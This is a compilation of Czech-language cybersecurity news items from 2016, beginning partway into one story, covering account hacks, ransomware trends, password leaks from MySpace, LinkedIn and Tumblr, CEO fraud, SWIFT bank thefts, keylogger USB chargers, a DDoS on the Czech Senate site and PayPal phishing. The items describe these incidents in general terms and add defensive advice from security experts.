Hackeři se s hacknutím zmiňovaných účtů pochlubili v pondělí ráno na mikroblogovací síti Twitter. „Hej @finkd (přezdívka Zuckerberga na Twitteru, pozn. red.), získali jsme přístup k tvým účtům, prosíme, kontaktuj nás,“ vyzvali šéfa Facebooku hackeři.

Firma po napadení uvedla, že účty jejího šéfa byly znovu zabezpečeny.

Účet hackerů ze skupiny OurMine na sociální síti Twitter
FOTO: repro Twitter

Zároveň doplnili, že jim v žádném případě nejde o odcizení virtuální identity či nějakých citlivých dat. Pouze prý chtěli „otestovat Zuckerbergovo zabezpečení“, tedy přesněji řečeno jeho heslo.

Vše totiž nasvědčuje tomu, že šéf Facebooku používal na různých sociálních sítích stejné heslo, díky čemuž pak hackeři získali přístup hned na čtyři různé služby.

Účet hackerů byl zablokován
Reakce na oznámení hackerů o úspěšném útoku byla prakticky okamžitá. Twitter zablokoval jejich oficiální účet, prostřednictvím kterého se chlubili. Ten byl přitom poměrně populární, neboť jej sledovalo více než 40 000 lidí.

Samotný Zuckerberg se však k napadení svých účtů oficiálně nevyjádřil.

Jisté je nicméně to, že hackeři ze skupiny OurMine nejsou žádní začátečníci. Na přelomu května a června se jim totiž podařilo získat přístup k internetovým účtům zakladatele Microsoftu Billa Gatese či zpěváka Christiana Collinse.


Vyděračských webů s ransomwarem přibývá, za první čtvrtletí o 3500 procent

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Závratný nárůst počtu nebezpečných internetových stránek, v nichž se skrývá vyděračský vir ransomware, který zašifruje obsah počítače, a jeho tvůrce žádá po uživateli výkupné, zaznamenala americká bezpečnostní společnost Infoblox.
Z jejího pravidelného výzkumu Threat Infoblox DNS Index vyplývá, že jen za první čtvrtletí letošního roku vzrostl počet internetových domén zneužitých ransomwarem oproti poslednímu kvartálu 2015 o rekordních 3500 procent. Útočníci se přitom začali stále více zaměřovat na firmy, u kterých vytušili větší šanci získat výkupné.

Neplaťte útočníkům výkupné, motivuje je to k dalším útokům.
Petr Šnajdr, bezpečnostní expert společnosti ESET
„Došlo k seismickému nárůstu hrozeb ransomwaru, které se posouvají od běžných uživatelů internetu, od nichž útočníci mohou získat výkupné v řádu několika dolarů, k firmám všech velikostí, včetně těch největších. Náš index hrozeb ukazuje, že kyber zločinci chtějí ve velkém měřítku využít právě této příležitosti,“ říká viceprezident společnosti Infoblox Rod Rasmussen.

Útoky ransomwaru se nesoustředí pouze na počítače nebo notebooky. Antivirová společnost ESET již začátkem letošního roku upozornila na výrazný nárůst případů ransomware útoků na mobilní zařízení s operačním systémem Android. Hrozba se nevyhýbá ani zařízením společnosti Apple s operačním systémem iOS X.

Jakmile je zařízení infikováno ransomwarem, nemá uživatel prakticky žádnou šanci je odblokovat. Za klíč, který by je odšifroval, musí útočníkům zaplatit. Neexistuje však žádná záruka, že po zaplacení budou zablokované soubory nebo celé zařízení opravdu dešifrovány. Bezpečnostní experti se proto shodují, že útočníkům by se výkupné platit nemělo.

„Motivuje je to k dalším útokům. Pokud by jim lidé neplatili a řádně si zálohovali data, útočníci by ztratili potřebu šířit ransomware,“ vysvětluje Petr Šnajdr, bezpečnostní expert společnosti ESET. Externí disk pro zálohu dat však nesmí být dlouhodobě připojen k zařízení, jehož prostřednictvím se uživatel připojuje k internetu, jinak by mohly být zálohované soubory rovněž zašifrovány.

Lidé by neměli bezhlavě otevírat přílohy
Ransomware se často šíří formou příloh nevyžádaných e-mailů nebo využívá chyb v programech Adobe Flash či Java. Stačí tedy, aby uživatel navštívil stránku s infikovanou reklamou ve Flashi a neměl tento program aktualizovaný, a bude přesměrován na web, z něhož se mu do zařízení stáhne a instaluje ransomware.

„Lidé by neměli bezhlavě otevírat přílohy e-mailů, které je vyzývají k platbě údajných pohledávek, ani klikat na podezřelé odkazy na internetových stránkách. Zejména ve firmách by zaměstnanci měli pravidelně podstupovat bezpečnostní školení, protože riziko, že útočník pronikne do firemní sítě, a firma přijde o velké množství citlivých dat, je opravdu veliké,“ upozorňuje Petr Šnajdr.

Nejvíce škodlivých webů s ransomwarem se podle výzkumu Threat Infoblox DNS Index aktuálně objevuje ve Spojených státech (41 procent). Následuje Portugalsko (17 procent), Rusko (12 procent), Nizozemí (10 procent), Velká Británie (8 procent) a Island (6 procent).


Tvůrce bankovního viru Gozi odsouzen k pokutě sedm miliónů dolarů

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Téměř sedm miliónů dolarů (175 miliónů korun) má zaplatit hacker Nikita Kuzmin, který v roce 2007 vytvořil a použil jeden z prvních bankovních počítačových virů Gozi zaměřených na prolamování bankovních účtů.
Rozhodl o tom soud v New Yorku, který už dříve Kuzminovi uložil trest 37 měsíců veřejně prospěšných prací. Mladík, který pochází z Ruska, byl dopaden v roce 2011 a ke svým činům se doznal.

Škodlivý kód Gozi napadl milióny počítačů po celém světě a způsobil škody ve výši několika desítek miliónů dolarů. Ve své době si s ním neuměly poradit ani antivirové programy.

Kromě toho Kuzmin jako jeden z prvních kyberzločinců začal své služby a vybudovanou infrastrukturu pronajímat dalším hackerům. Účtoval si za to poplatek 500 dolarů týdně (téměř 13 tisíc korun) v digitální měně WebMoney. Zprostředkovával tak krádeže dat i finančních prostředků dalším kriminálníkům.

Díky dvoufaktorové autentizaci je pro hackery mnohem těžší kompromitovat bankovní účty.
Martin Skýpala, produktový specialista společnosti ESET
Nikita Kuzmin svým „klientům“ nabízel přístup ke konkrétním bankovním ústavům a umožňoval jim provádět kybernetické útoky. Na těchto aktivitách vydělal nejméně 250 tisíc dolarů (přes šest miliónů korun). Po dopadení u něj vyšetřovatelé zajistili počítač se záznamy o 10 tisících prolomených bankovních účtech od 5200 uživatelů počítačů včetně přihlašovacích údajů do více než 300 bank po celém světě.

V Kuzminově případu je obviněn i rumunský hacker Mihai Ionut Paunescu, který mu poskytoval „neprůstřelný“ hosting a čeká se na jeho vydání do Spojených států.

„Díky plošnému zavedení dvoufaktorové autentizace do internetového bankovnictví je pro hackery mnohem těžší kompromitovat bankovní účty než dříve. Pokud se jim však povede infikovat počítač a pomocí technik sociálního inženýrství i mobilní zařízení uživatele, je cesta volná,“ říká Martin Skýpala, produktový specialista společnosti ESET.

Proto je velmi důležité používat pravidelně aktualizované bezpečnostní řešení a veškerou komunikaci s bankou (e-mail, internet) pečlivě ověřovat.


Falešný šéf připravil rakouskou firmu o 50 miliónů eur. Skutečný ředitel končí

27.7.2016  Zdroj: Novinky/Bezpečnost Podvod
Víc než miliardovou škodu způsobil rakouskému výrobci leteckých dílů FACC neznámý hacker, který se vydával za prezidenta společnosti Waltera Stephana a e-mailem přikázal zaměstnancům firmy, aby peníze převedli na účty na Slovensku a v Asii.
K incidentu, který FACC připravil o desetinu průměrného ročního výnosu, došlo již v lednu letošního roku. Po důkladném interním i externím policejním vyšetřování dozorčí rada společnosti tuto středu oznámila, že s okamžitou platností ukončuje pracovní poměr šéfovi FACC Walteru Stephanovi.

Podvod, ke kterému neznámý hacker využil metod sociálního inženýrství, byl založen na údajné zahraniční akvizici. Zaměstnancům firmy přišel e-mail od prezidenta FACC, v němž Walter Stephan požadoval vyplatit zálohy za koupi nejmenované společnosti.

Že se jedná o podvod, zjistil výrobce leteckých dílů, mezi jehož zákazníky patří Airbus, Boeing nebo Rolls-Royce, příliš pozdě: 50 miliónů eur (1,35 miliardy korun) bylo nenávratně pryč. Dozorčí rada FACC dospěla k názoru, že skutečný šéf firmy „vážně porušil své povinnosti“ a musí odejít, informoval rakouský list Der Standard.

Hacker zneužil heslo k e-mailu
Ačkoli to deník výslovně neuvádí, hackerovi se patrně podařilo prolomit do pracovní pošty Waltera Stephana a zneužít jeho e-mail k pokynu zaměstnancům, aby vyplatili zmiňovanou částku. „O způsobu zneužití účtu prezidenta společnosti toho moc nevíme. Mohlo dojít k tomu, že útočník odhalil heslo k poštovní schránce prezidenta společnosti, nebo heslo získal pomocí nějakého škodlivého kódu,“ říká Petr Šnajdr, bezpečnostní expert společnosti ESET.

Metody sociálního inženýrství jsou stále častějším způsobem útoků na firmy.
Petr Šnajdr, bezpečnostní expert společnosti ESET
Sofistikovaná krádež se promítla do hospodářských výsledků FACC za loňský rok: firma zaznamenala pětinásobný meziroční nárůst provozní ztráty ze 4,5 miliónů eur v roce 2014 na 23,4 miliónů eur za rok 2015. Firma, která je kótovaná na vídeňské burze, kvůli skandálu zrušila plánovanou středeční tiskovou konferenci k hospodářským výsledkům za loňský rok.

Pokud by FACC nepřišla o 50 miliónů eur, zakončila by fiskální rok 2015/16 provozním ziskem 18,6 miliónu eur. Ztrátu způsobenou útokem se firmě podařilo snížit na 41,9 miliónu eur, když zajistila 10,9 miliónu eur z ukradené částky.

„Metody sociálního inženýrství jsou stále častějším způsobem útoků na firmy. Zločinci při nich využívají nepozornosti nebo zvědavosti zaměstnanců. Jde samozřejmě i o pochybení zaměstnanců, protože nikdo neověřil, zda mají tak obrovskou sumu opravdu převést z bankovního účtu,“ podotýká Petr Šnajdr. Firmy by podle něj neměly zapomínat na pravidelné školení zaměstnanců o zásadách počítačové bezpečnosti.


K prolomení firemních účtů na internetu stačí hackerům necelá hodina, odhalila studie

27.7.2016  Zdroj: Novinky/Bezpečnost Hacking
Drtivá většina firem nemá dostatečně zabezpečený přístup ke své počítačové síti, takže hackerům stačí k prolomení jejich systému necelá hodina.
Vyplývá to ze studie Data Breach Investigations Report (DBIR), kterou zveřejnila americká společnost Verzion. Výsledky výzkumu jsou alarmující: zmiňovaná necelá hodina by stačila k infiltraci u 93 procent sledovaných společností. Verzion analyzovala víc než 100 tisíc bezpečnostních incidentů a 2260 potvrzených průniků do firemní IT infrastruktury po celém světě. „Závěry studie by měly být varováním pro organizace po celém světě,“ konstatuje server Infosecurity Magazine.

Zatímco útočníci neměli problém dostat se poměrně rychle k citlivým firemním datům, napadeným společnostem většinou trvalo podstatně delší dobu, než vůbec útok zaznamenaly.

Podle studie oběti v 83 procentech případů odhalily potíže až po několika týdnech. Přitom čím později se na útok přijde, tím větší má dopad na firmu. Útočník může dny a týdny stahovat citlivá data nebo záměrně poškozovat firemní systémy.

K víc než třetině krádeží zařízení dochází přímo na pracovišti.
autoři studie DBIR
Autor výzkumu, společnost Verzion, upozorňuje, že ve dvou třetinách případů odhalených útoků bylo příčinou slabé nebo ukradené přihlašovací heslo do firemní sítě. „Opět to potvrzuje nutnost používat dvoufaktorovou autentizaci nebo alespoň nástroje Password Manager, zejména u účtů klíčových zaměstnanců,“ upozorňují autoři studie.

„Neexistuje nic takového jako neproniknutelný systém, ale často i trochu nadprůměrná ochrana odradí útočníky a přiměje je, aby si hledali nějaký jiný a snadnější cíl. Je smutné, že si to mnoho společností neuvědomuje a nemá ani takto skromné ambice v ochraně před kyber útoky,“ poznamenávají analytici Verzionu.

Nedostatečnou ochranu zjistili nejen v přístupech na firemní účty, ale také u samotných zařízení v případě krádeže. Právě krádež nebo ztráta notebooku, tabletu nebo telefonu přitom figuruje na třetí příčce v žebříčku nejčastějších způsobů, jak se neoprávněná osoba dostala k firemním datům.

Překvapivé je, že k víc než třetině krádeží zařízení (konkrétně v 39 procentech případů) dochází přímo na pracovišti, další třetina je odcizena ze služebních automobilů. „Zaměstnancům je proto potřeba stále zdůrazňovat nutnost šifrování citlivých dat,“ zdůrazňují autoři studie DBIR.

„Lidský faktor zastává velmi důležitou roli a nelze jej v žádném případě podcenit. Dále je však třeba mít zajištěný i spolehlivý bezpečnostní software a v optimálním případě i nástroje pro dvoufaktorovou autentizaci. Bez nich by se v dnešní době neměla obejít žádná společnost, která si cení svých dat,“ dodává Petr Šnajdr, bezpečnostní expert antivirové společnosti ESET.


Olympiáda nahrává počítačovým pirátům

27.7.2016  Zdroj: Novinky/Bezpečnost Podvod
Už za dva měsíce odstartují letní olympijské hry v Riu de Janeiru. Právě nedočkaví sportovní fanoušci by se ale měli mít na pozoru, protože na ně na internetu v poslední době líčí pasti počítačoví piráti. Snaží se tak vylákat citlivé údaje i propašovat škodlivé kódy do cizích počítačů.
Na rostoucí riziko kybernetických útoků v souvislosti s hrami v Riu upozornili bezpečnostní experti z antivirové společnosti Kaspersky Lab. Ti zachytili první nevyžádané e-maily už v minulém roce, v posledních týdnech ale počet rozeslaných spamů stoupá.

Nejčastěji se kyberzločinci snaží důvěřivce nalákat na výhru vstupenek v soutěži, kterou organizovaly Mezinárodní olympijský výbor a brazilská vláda. Tvrdí, že právě jejich e-mail byl náhodně vybrán z obřího seznamu účastníků.

Ve spamové zprávě se nachází odkaz na formulář, který je nutné k převzetí „ceny“ vyplnit. Pokud to uživatelé skutečně udělají, nevědomky tak poskytnou počítačovým pirátům všechny citlivé údaje.

Podezřele levné vstupenky
Ještě větší riziko nicméně představují nejrůznější podvodné weby, které nabízejí vstupenky na olympiádu za podezřele nízkou cenu. Na nich totiž podvodníci vyzývají uživatele, aby v informacích o objednávce vyplnili také údaje o své platební kartě.

Tím pochopitelně dají kyberzločincům do rukou vše, co potřebují, aby mohli lidem vybílit bankovní účet.

Počítačoví piráti jsou dokonce tak vynalézaví, že objednávku potvrdí své oběti do e-mailu s tím, že samotné lístky dorazí za dva až tři týdny. Uživatelé tak mohou nabýt falešného pocitu bezpečí, ve skutečnosti ale nechají podvodníkům dostatek času, aby mohli účet vybílit.

Před weby nabízejícími až podezřele levné vstupenky a před nevyžádanými zprávami týkajícími se olympijských her by se tedy měli mít uživatelé na pozoru.


V Rusku zadrželi desítky hackerů, měli ukrást přes 600 miliónů

27.7.2016  Zdroj: Novinky/Bezpečnost Zákony
V Rusku bylo za počítačovou kriminalitu zatčeno 50 lidí, kteří jsou podezřelí, že s pomocí nezákonných počítačových operací ukradli 1,7 miliardy rublů (615 miliónů Kč). Informovala o tom agentura Interfax. Podle ní se zátahů na členy gangu na 80 místech v 15 oblastech Ruska podílelo ministerstvo vnitra a Federální bezpečnostní služba (FSB).
Osmnácti zadrženým bylo zamítnuto propuštění na kauci, další tři byli umístěni do domácího vězení. Všichni byli obviněni z vytvoření, šíření a používání nezákonných počítačových programů.

Policie zabavila počítače a komunikační zařízení, bankovní karty, finanční dokumenty a velké sumy peněz. Podle Interfaxu vyšetřování ještě pokračuje.

FSB oznámila, že zadržené osoby kradly peníze z ruských finančních institucí.


Největší hackerský útok potvrzen. V ohrožení jsou stovky miliónů uživatelů

27.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Víc než 400 miliónů hesel, která se od pondělí nabízela na internetovém černém trhu, jsou podle všeho pravá. Ve středu to potvrdili zástupci sociální sítě MySpace, ze které mají odcizená data pocházet. Upozornil na to server The Hacker Hews. Přestože MySpace dnes již nepatří mezi ty nejpopulárnější, nebezpečí spočívá v tom, že řada uživatelů používá stejné přístupové údaje i k dalším službám.
Útok na MySpace se měl konat už v roce 2013. Že se hackerovi nebo neznámé skupince hackerů podařilo odcizit stovky miliónů přístupových údajů, se však ukázalo až tento týden.

Hacker vystupující pod přezdívkou Peace totiž obrovský balík přihlašovacích údajů nabídl k prodeji na černém trhu. Požadoval za ně šest bitcoinů, tedy v přepočtu za bezmála 70 tisíc korun. Zmiňovanou virtuální měnu nezvolil hacker náhodou – nelze ji totiž snadno vystopovat, a tak i po zaplacení zůstane jeho identita nadále skryta.

Účty mohou být kompromitovány.
Z prohlášení MySpace
„Jsme přesvědčeni, že nejde o podvrh a že v roce 2013 nebo někdy dříve skutečně došlo k narušení bezpečnosti. Účty z tohoto roku a starší tedy mohou být kompromitovány,“ varovali zástupci sociální sítě.

V současnosti server MySpace používá jen několik desítek miliónů uživatelů, před lety však byla její popularita daleko větší. Zástupci sociální sítě se chlubí tím, že má miliardu registrovaných uživatelů.

A právě to představuje podle bezpečnostních expertů velký problém. V ohrožení jsou totiž i uživatelé, kteří svůj účet již dávno nepoužívají. Celá řada lidí totiž používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.

Databáze s přihlašovacími údaji tak může představovat pro uživatele potenciální riziko i přesto, že útok proběhl před třemi lety.

Nejde o ojedinělý útok
V celé historii internetu není zaznamenán případ, kdy by se podařilo jedinému hackerovi nebo skupince počítačových pirátů odcizit tak velké množství hesel, než nyní v případě sociální sítě MySpace.

Na internetovém černém trhu se sice nabízely ještě větší balíky hesel, vždy se však nakonec ukázalo, že jde o podvrh.

V posledních týdnech jde už o třetí velký únik hesel, na který se přišlo. Na černém internetovém trhu se nejprve v polovině května objevil balík 167 miliónů hesel z profesní sítě LinkedIn, pak 65 miliónů přihlašovacích údajů ze sítě Tumblr. 

Pozor na jednoduchá hesla
Únik dat ze sítě MySpace jasně ukazuje na to, jak zranitelná mohou hesla a pochopitelně také samotné uživatelské účty na síti být. Vhodné je proto nejen vymýšlet sofistikovaná hesla, ale alespoň jednou za pár měsíců je pravidelně měnit.

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.


Zaznamenali jsme desítky hackerských útoků, přiznala americká centrální banka

23.7.2016 Zdroj: Novinky/Bezpečnost Hacking
Více než pět desítek případů narušení kybernetické bezpečnosti řešili v uplynulých letech bezpečnostní experti americké centrální banky (Fed). Podle interního vyšetřování za nimi stáli hackeři či zpravodajci. Upozornila na to agentura Reuters.
Všechny útoky jsou popsány v dokumentu, který si agentura Reuters vyžádala na základě zákona o svobodném přístupu k informacím. Zástupci Fedu však jednotlivé případy oficiálně nechtěli komentovat.

Ze zveřejněných dat tak bohužel není jasné, zda se během útoků podařilo hackerům či zpravodajcům odcizit nějaké peníze či citlivé údaje jednotlivých klientů. Jisté je nicméně to, že útočníci dokázali zabezpečení banky překonat a dostat se do jejích systémů. Jinými slovy – minimálně v případě zpravodajců – mohlo jít o špionáž.

Všechny útoky se měly odehrát mezi lety 2011 a 2015, zástupci banky o nich informovali až nyní v dokumentu připraveném pro agenturu Reuters.

Ve hře jsou stovky miliónů
Zprávy o kybernetických útocích na Fed přicházejí jen pár týdnů poté, co se ukázalo, že zatím neznámí hackeři připravili banky o stovky miliónů korun.

Například z účtu bangladéšské centrální banky, který je vedený právě u Fedu, zmizelo loni 81 miliónů dolarů, tedy v přepočtu více než 1,9 miliardy korun. 

Ekvádorská banka Banco del Austro (BDA) pak v květnu uvedla, že měla během útoku přijít o 12 miliónů dolarů (bezmála 290 miliónů korun). 

K penězům se dostali snadno
K penězům se přitom počítačoví piráti dostali v obou případech až neuvěřitelně snadno, způsob provedení byl při obou útocích do posledního puntíku stejný. Nejprve do počítačů v bance propašovali viry, díky kterým získali přístupové kódy do SWIFT systému.

Ve virtuálním světě jedniček a nul je to stejné jako získat klíče od bankovního trezoru. SWIFT systém totiž jednotlivé banky využívají jako bezpečnostní standard k ověřování transferů mezi sebou. Pomocí něj jsou schopny získat jakési podpisové klíče, na základě kterých se pak identifikuje jedna finanční instituce před druhou klidně i na druhém konci planety. Zjednodušeně řečeno, banky se takto při komunikaci poznají.

A právě toho využili kyberzločinci. Po získání kódů do SWIFT systému začali pomalu provádět jednu platbu za druhou. Aby nebyla jejich činnost příliš nápadná, převáděli jen něco málo přes milión dolarů denně. Tak si jejich práce nevšimli zaměstnanci banky několik dní.

Ani při jednom ze zmiňovaných útoků se nepodařilo počítačové piráty vypátrat.


Zavirované mohou být už i USB nabíječky

27.7.2016 Zdroj: Novinky/Bezpečnost Viry
Bezpečnostní experti nás neustále nabádají, že máme dbát na bezpečnost chytrých telefonů a klasických počítačů, abychom nedali kyberzločincům šanci propašovat na tato zařízení škodlivý software. Obezřetnost je ale potřeba také u zařízení, u kterých by to většinu lidí patrně ani nenapadlo. Viry, v tomto případě schopné odposlouchávat bezdrátové klávesnice, se totiž mohou ukrývat například i v USB nabíječkách, jak upozornil server The Hacker News.
Případem se zavirovanými nabíječkami se již zabývá americký Federální úřad pro vyšetřování (FBI), který je zachytil ve volném prodeji na internetu. Detailní analýza pak ukázala, že tato zařízení skutečně představují pro uživatele riziko.

Na první pohled obyčejné USB nabíječky totiž v útrobách ukrývaly miniaturní počítač se škodlivým kódem. Konkrétně šlo o jistou formu keyloggeru, tedy viru schopného zaznamenávat každý stisk klávesy a odposlouchávat probíhající komunikaci.

Riziko bezdrátových klávesnic
Zavirované USB nabíječky byly určeny prakticky pro všechna zařízení vybavená USB portem. Tedy pro chytré telefony, počítačové tablety, fotoaparáty, videokamery, čtečky elektronických knih, ale například i pro různá zařízení určená pro chytrou domácnost.

Rozebraná USB nabíječka odhalila sofistikovaný špionážní systém založený na malém počítači, na kterém byl nainstalovaný škodlivý kód.
Pikantní na tom je, že odposlouchávané zařízení nemuselo být k nabíječce vůbec připojeno. Škodlivý kód totiž zachytával komunikaci výhradně z bezdrátových klávesnic v dosahu. Ohroženi tedy jinými slovy byli uživatelé, kteří adaptér měli doma a zároveň s mobilem, tabletem nebo počítačem pracovali pomocí bezdrátové klávesnice v okolí cca deseti metrů.

Vyšetřovatelé z FBI se k problému postavili celkem přímočaře. Uživatelům – především z řad firem – doporučili, aby bezdrátové klávesnice nepoužívali vůbec. Na klávesnice s klasickým kabelem je totiž špionážní software ukrytý v nabíječkách krátký.

Odposlouchávala, i když nebyla zapojená
S tvorbou takto sofistikovaného špionážního nástroje si dali kyberzločinci opravdu záležet. V útrobách nabíječky se totiž ukrývala dokonce i záložní baterie, aby byl špionážní software schopný odposlouchávat zařízení i v případě, kdy nebude zapojena do elektrické zásuvky.

Neznačkové nabíječky obsahující virus se prodávaly především v USA. Zda byly dostupné také v Evropě, zatím není jasné. Jisté je nicméně to, že bezpečnostní riziko pro uživatele může představovat už i tak nenápadné zařízení, jako je obyčejná USB nabíječka.

Aktuální verze špionážního softwaru sice zvládne odposlouchávat jen bezdrátové klávesnice, není ale vyloučeno, že kyberzločinci nějakou další variantu vylepší natolik, že bude schopná stáhnout například všechna data z připojeného mobilu nebo tabletu.


Ze sociální sítě Tumblr unikly desítky miliónů hesel

27.7.2016  Zdroj: Novinky/Bezpečnost Sociální sítě
LinkedIn, MySpace a nyní také Tumblr. Poslední zmiňovaná sociální síť se v úterý zapsala na seznam webů, které podlehly útokům počítačových pirátů. Těm se podle serveru deníku The Guardian podařilo odcizit 65 miliónů přihlašovacích údajů.
Zástupci sítě Tumblr přiznali už zkraje března, že do jejich sítě pronikli v minulosti počítačoví piráti. Žádné detaily však tehdy neprozradili.

Patrně i kvůli tomu nejspíše nikoho nenapadlo, že by únik dat mohl být tak velkých rozměrů. Databáze, která obsahuje 65 miliónů e-mailových adres a hesel, se již nabízí k prodeji na internetovém černém trhu.

Útok se stal už v roce 2013
Data mají pocházet z útoku, který se stal už v roce 2013. Teoreticky tedy mohou být ohroženi uživatelé, kteří používají stále stejné heslo, případně účet v posledních letech nepoužívají a stejné přihlašovací údaje mají i na jiných webech.

Podle zástupců sociální sítě však panika není na místě. „Jakmile jsme se dozvěděli o celé záležitosti, náš bezpečnostní tým ji důkladně prošetřil. Podle získaných dat můžeme konstatovat, že pro naše uživatele nepředstavuje žádné reálné riziko,“ stojí v prohlášení firmy.

Podle serveru The Hacker News byla totiž databáze s hesly velmi dobře zabezpečena, a tak je nepravděpodobné, že by se útočníkům podařilo šifrování prolomit a získat obsah v použitelné verzi.

Třetí velký únik
Patrně i kvůli tomu prodává hacker na černém trhu databázi tak levně, požaduje za ni pouze 0,5 bitcoinu, tedy něco málo přes pět tisíc korun.

V posledních týdnech jde už o třetí velký únik hesel, na který se přišlo. Na černém internetovém trhu se nejprve v polovině května objevil balík 167 miliónů hesel z profesní sítě LinkedIn. 

Tento týden pak bezpečnostní experti upozornili, že jeden hacker nabízí k prodeji také přes 400 miliónů hesel ze sociální sítě MySpace.


Hackeři se pomstili za cenzuru internetu, vyřadili z provozu stránky Senátu

27.7.2016  Zdroj: Novinky/Bezpečnost Hacking
V pondělí večer byly déle než hodinu a půl nedostupné internetové stránky Senátu. Z provozu je vyřadili hackeři z hnutí Anonymous. Jak sami tvrdí, jde o odplatu za schválení zákona o hazardních hrách. Ministerstvo financí díky normě získá pravomoc blokovat webové stránky podle svého uvážení.
„Shodili jsme Senat.cz, protože jste schválili zákon proti volnému přístupu k internetu,“ uvádí se v prohlášení hackerů.

Stránky Senátu se podařilo hnutí Anonymous vyřadit z provozu okolo 21. hodiny, uvedl server Root.cz. Použili k tomu techniku zvanou DDoS, při které desítky až stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se takto napadená webová stránka tváří jako nedostupná.

Počítačoví piráti navíc varovali, že útok nebude ojedinělý. „Budeme shazovat mnohem více. Jsme legie. Neodpouštíme. Nezapomínáme. Očekávejte nás,“ uvedli hackeři.

Zbývá už jen podpis prezidenta
Návrh zákona o přísnější regulaci hazardu, který počítá s pravomocí ministerstva financí na blokování webových stránek, prošel minulý týden ve čtvrtek horní parlamentní komorou. Zbývá už jen podpis prezidenta. 

Ministerstvo financí vedené šéfem ANO Andrejem Babišem tento návrh dlouhodobě brání a obhajuje ho tím, že podobné modely blokace již dávno fungují v zahraničí. Odpůrci však tvrdí, že Česku na rozdíl od jiných států prý chybí pojistky proti možnému zneužití. 

Zákon o hazardu zatíží také samotné poskytovatele internetového připojení. Budou si totiž muset pořídit zařízení, pomocí nichž budou schopni stránky blokovat. Pro některé menší firmy by mohl být dokonce likvidační, jak již dříve varoval předseda Pirátské strany Ivan Bartoš.


Další velký únik hesel? Hacker jich nabízí k prodeji přes 400 miliónů

27.7.2016  Zdroj: Novinky/Bezpečnost Hacking
Bezpečnostní experti mají v posledních týdnech opravdu napilno, s úniky hesel z velkých internetových služeb se totiž doslova roztrhl pytel. Další na řadě je podle všeho komunitní server MySpace, ze kterého mělo uniknout více než 400 miliónů hesel.
Balík uniklých hesel je k prodeji na černém internetovém trhu za šest bitcoinů, tedy v přepočtu za bezmála 70 tisíc korun. Zmiňovanou virtuální měnu nezvolil hacker náhodou – nelze ji totiž snadno vystopovat, a tak i po zaplacení zůstane jeho identita nadále skryta.

Nabízí je stejný hacker, který před dvěma týdny nabízel k prodeji balík 167 miliónů hesel ze sítě LinkedIn. 

Kdy hesla unikla?
To je jeden z hlavních důvodů, proč jsou bezpečnostní experti ostražití. Odcizená hesla z LinkedIn se totiž ukázala být pravá, vše tedy nasvědčuje tomu, že o podvod nepůjde ani v případě MySpace.

Zástupci komunitní sítě MySpace to však zatím oficiálně nepotvrdili.

Podle počtu nabízených hesel to však vypadá, že se útok musel stát již před několika lety, případně že data pocházejí z více útoků. V současnosti totiž komunitní server používá jen několik desítek miliónů uživatelů. Samotný MySpace se nicméně chlubí tím, že má miliardu registrovaných uživatelů.

Raději změnit hesla
Z bezpečnostních důvodů by si tedy uživatelé komunitní sítě MySpace měli změnit svá přístupová hesla. Podceňovat riziko zneužití dat by neměli ani uživatelé, kteří mají na MySpace registraci, ale svůj účet už dávno nepoužívají.

Celá řada lidí totiž používá stejné přihlašovací údaje k různým webovým službám. Pro počítačové piráty tedy není nic jednoduššího než hesla vyzkoušet i na jiných serverech.

Bezpečné heslo by mělo mít minimálně šest znaků a mělo by obsahovat číslice a ideálně velká i malá písmena. Heslo by naopak v žádném případě nemělo být tvořeno jménem uživatele, jednoduchými slovy (jako je například heslo) nebo pouhou posloupností číslic.


Podvodníci se snaží vylákat informace o platební kartě, aby mohli vybílit účet

27.7.2016  Zdroj: Novinky/Bezpečnost Podvod
Národní bezpečnostní tým CSIRT.CZ varoval před novým phishingovým útokem, který cílí na uživatele PayPalu. Počítačoví piráti se snaží z důvěřivců vylákat citlivé údaje, aby získali přístup k jejich platebnímu účtu. Pak jim prakticky nic nebrání v tom, aby jej vybílili.
Internetové stránky společnosti PayPal
Internetové stránky společnosti PayPal
Co je phishing?

Internetoví podvodníci často rozesílají e-maily, které vyvolávají dojem, že pocházejí od důvěryhodné firmy, banky, úřadu nebo webové stránky.
Pomocí těchto zpráv se útočníci snaží vylákat citlivé informace, které se týkají například bankovních kont. Tato data následně využívají k odčerpání financí z účtu postiženého.
„Jedná se o phishingovou kampaň, ve které hackeři tvrdí, že došlo k omezení oprávnění uživatele účtu a k obnovení původního nastavení je potřeba ověření některých informací,“ konstatoval Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Snaží se tedy donutit uživatele kliknout na odkaz v e-mailu. Ten vede na stránky, které na první pohled vypadají, jako by patřily skutečně společnosti PayPal. Ve skutečnosti jde ale pouze o podvodný web, prostřednictvím něhož se snaží kyberzločinci vylákat všechny důležité údaje.


FOTO: repro hackread.com

Jak upozornil server Hackread, kromě obecných informací chtějí počítačoví piráti vyplnit i kompletní informace o platební kartě. Ty se skutečně zadávají i při běžné registraci ke službě PayPal, a tak to uživatelům nemusí být na první pohled podezřelé.

Pokud informace o platební kartě důvěřivci skutečně na podvodném webu vyplní, dají tak útočníkům do ruky vše potřebné, aby mohli nekontrolovaně provádět jakékoli platby.

Vhodné je zabezpečit kartu pomocí SMS
Bezpečnostní experti proto nabádají k obezřetnosti. „Doporučení spojené s touto kampaní je jednoduché, mažte e-maily od PayPalu, které začínají obecným oslovením, jako je ‚Drahý zákazníku‘ ‚Vážený zákazníku‘ či ‚Vážený kliente‘,“ doplnil Bašta s tím, že zástupci PayPalu takovým způsobem s uživatelem nekomunikují.

„Také je třeba pamatovat na to, že žádná solidní finanční instituce nebude nikdy požadovat jakékoli citlivé informace pomocí e-mailu,“ uzavřel bezpečnostní analytik CSIRT.CZ.

